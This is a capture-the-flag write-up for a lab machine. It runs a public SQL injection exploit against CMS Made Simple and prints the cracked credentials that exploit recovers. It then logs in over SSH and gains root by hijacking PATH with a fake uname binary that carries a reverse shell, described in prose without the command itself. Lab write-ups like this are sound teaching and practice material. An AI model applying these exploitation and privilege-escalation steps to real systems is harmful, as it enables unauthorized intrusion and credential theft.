Again, we start with nmap -sC -sV -Pn -p- -oA ./Writeup 10.10.10.138
So, we are dealing with SSH, HTTP on their usual ports. Navigating to the HTTP side has a pretty dope/nostalgic/retro page on it that basically tells us that there's DoS protections in place. Like that would ever stop us, right everyone? <wink, wink, nudge, nudge> Although that does kind of kill the usual Gobuster/Dirb/Dirbuster plan.
We do know that there is a DoS Web App Protection script running, so brute checking directories is out, but we also know that /writeup is disallowed from the nmap script. Going into /writeup and checking the source code, we can see that it is using CMS Made Simple from around 2019 (copyright is 2004-2019). That means that it's somewhere between version 2.2.9 and 2.2.13. Running a quick CMS Made Simple 2.2 searchsploit finds a ready-made exploit for us to run some SQLi on.
So, let's run that and see what happens!
python 46635 -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: email@example.com
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Now we can ssh as jkr with raykayjay9 as the password. Run LinEnum and I see that jkr is in a group called staff. That's not a normal group..... Anything special about it?
It looks like we can pretty much do anything in /usr/local since staff owns it. Still not seeing an easy win here. Let's check PATH variables.
Well, there's something. We belong to the Staff group, which owns everything in /usr/local, and /usr/local/bin is the first place the system looks for a system command. Let's mock up a system command (a simple one like vim) with a reverse shell call in it and see if PATH runs it as root on a new login. The answer is no. Let's try it with uname instead since it looks like new ssh sessions run uname on login.
It looks like uname did the trick! Grab your goodies (flags, shadow file, ifconfig, etc) and you are finished!